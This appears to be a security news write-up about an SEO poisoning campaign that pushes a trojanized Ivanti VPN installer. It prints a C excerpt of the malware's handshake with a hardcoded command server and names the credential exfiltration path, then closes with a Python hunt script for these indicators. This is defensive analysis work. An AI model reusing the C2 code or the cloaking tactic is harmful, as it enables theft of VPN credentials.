An aggressive SEO poisoning campaign has surfaced in early October 2025, preying on users searching for the legitimate Ivanti Pulse Secure VPN client.
Attackers have registered lookalike domains such as ivanti-pulsesecure.com and ivanti-secure-access.org to host trojanized installers that appear official.
Unsuspecting victims clicking on top search results are redirected to these malicious sites, where a signed MSI file is offered for download under the guise of Ivanti’s Secure Access Client.
The trojanized installer carries a credential-stealing DLL, designed to harvest saved VPN connection details and exfiltrate them to a C2 server hosted on Microsoft Azure infrastructure.
Zscaler researchers noted a sophisticated referrer-based content delivery tactic used by the phishing domains. When accessed directly in a browser, the sites display benign content without any download links, evading quick detection by analysts and security scanners.
Only users arriving via search engine referrals—particularly from Bing—are shown the malicious download button, exploiting the HTTP Referer header to cloak the true intent of the pages.
Once downloaded, the MSI installer drops two malicious DLLs—dwmapi.dll and pulseextension.dll—signed by a legitimate certificate authority to further bypass security controls.
These DLLs embed a sequence of routines to locate and parse the Ivanti connection store (connectionstore.dat), extracting saved URIs and credentials.
Delving into the infection mechanism reveals how the malware establishes persistence and stealth. Upon execution, the trojanized DLL initiates a network handshake with a hardcoded IP address in the Azure range (4.239.95.1) on port 8080.
The following C excerpt illustrates the socket setup and data exchange routine (the Winsock headers and the buffer and key declarations were missing from the published snippet and are added here; the XOR key value is not given in the report):

```c
#include <winsock2.h>
#include <ws2tcpip.h>
#pragma comment(lib, "ws2_32.lib")

/* Receive buffer must hold the 52-byte reply; key bytes come from the sample. */
unsigned char buf[0x34];
unsigned char key[0x30];

WSADATA wsa;
WSAStartup(MAKEWORD(2,2), &wsa);
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr = {0};
addr.sin_family = AF_INET;
addr.sin_port = htons(8080);
inet_pton(AF_INET, "4.239.95.1", &addr.sin_addr);
connect(sock, (struct sockaddr*)&addr, sizeof(addr));
// Receive 48 bytes from the C2
recv(sock, (char*)buf, 0x30, 0);
// XOR deobfuscation of the received block with the embedded key
for(int i=0;i<0x30;i++) buf[i]^=key[i];
// Send 52-byte obfuscated payload back to the C2
send(sock, (char*)buf, 0x34, 0);
```
After the initial handshake and XOR-based deobfuscation routine, the malware transmits stolen VPN credentials in an HTTP POST request to the path /incomeshit, a colloquial label for exfiltration channels.
Because the IP resides within Microsoft Azure’s range, security teams may overlook these connections as benign cloud traffic.
By masquerading as trusted software and incorporating advanced evasion techniques, this campaign demonstrates the potency of search engine poisoning as an initial access vector.
Organizations should validate any Ivanti installer checksums, monitor outbound connections to unfamiliar Azure IPs on port 8080, and educate users on verifying official download sources.
Continuous threat hunting for referrer-based anomalies remains essential to thwarting these stealthy attacks.
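As an added example (not code from the Zscaler report or this article), the following Python hunt turns the indicators above into three rules run over a constructed proxy log: connections to the hardcoded C2 on port 8080, POSTs to the /incomeshit path, and search-engine referrals landing on vendor-themed hosts that are not the vendor. The log format, the search-engine list beyond Bing, and the OFFICIAL_HOSTS allowlist are assumptions you would adapt to your own proxy.

```python
import ipaddress
from urllib.parse import urlparse

# Indicators named in the write-up above (page-specific values).
C2_ADDRS = {ipaddress.ip_address("4.239.95.1")}      # hardcoded Azure C2
C2_PORT = 8080
EXFIL_PATH = "/incomeshit"
SEARCH_ENGINES = {"www.bing.com", "www.google.com"}  # referrers that trigger the cloaked page (assumed list)
OFFICIAL_HOSTS = {"ivanti.com"}                       # assumption: your vendor allowlist

# Constructed proxy log sample (not real traffic). Space-separated fields:
# timestamp src dst:port method host path referer
SAMPLE_LOG = """\
2025-10-03T09:10:44Z 10.0.0.7 203.0.113.10:443 GET ivanti-pulsesecure.com /download https://www.bing.com/search?q=ivanti+pulse+secure
2025-10-03T09:12:01Z 10.0.0.7 4.239.95.1:8080 CONNECT - - -
2025-10-03T09:12:03Z 10.0.0.7 4.239.95.1:8080 POST 4.239.95.1 /incomeshit -
2025-10-03T09:15:00Z 10.0.0.9 198.51.100.20:443 GET www.ivanti.com /products https://www.bing.com/
"""

def is_official(host):
    """True if host is, or is a subdomain of, an allowlisted vendor domain."""
    return any(host == d or host.endswith("." + d) for d in OFFICIAL_HOSTS)

def classify(line):
    """Return the list of hunt rules a single log line matches."""
    ts, src, dst, method, host, path, referer = line.split(maxsplit=6)
    ip_str, port = dst.rsplit(":", 1)
    ip, port = ipaddress.ip_address(ip_str), int(port)
    hits = []
    # Rule 1: any connection to the hardcoded C2 on 8080 (the XOR handshake channel).
    if ip in C2_ADDRS and port == C2_PORT:
        hits.append("c2_handshake")
    # Rule 2: credential exfiltration POST to the known path, whatever the host.
    if method == "POST" and path == EXFIL_PATH:
        hits.append("exfil_post")
    # Rule 3: search-engine referral landing on an Ivanti-themed host that is not Ivanti.
    ref_host = urlparse(referer).netloc if referer != "-" else ""
    if ref_host in SEARCH_ENGINES and "ivanti" in host and not is_official(host):
        hits.append("seo_lookalike")
    return hits

def hunt(log_text):
    """Map each log line (1-based number) to the rules it matched; clean lines are omitted."""
    findings = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        hits = classify(line) if line.strip() else []
        if hits:
            findings[n] = hits
    return findings
```

Calling hunt(SAMPLE_LOG) flags lines 1 to 3 and leaves the genuine www.ivanti.com visit alone; feed it your own export to triage.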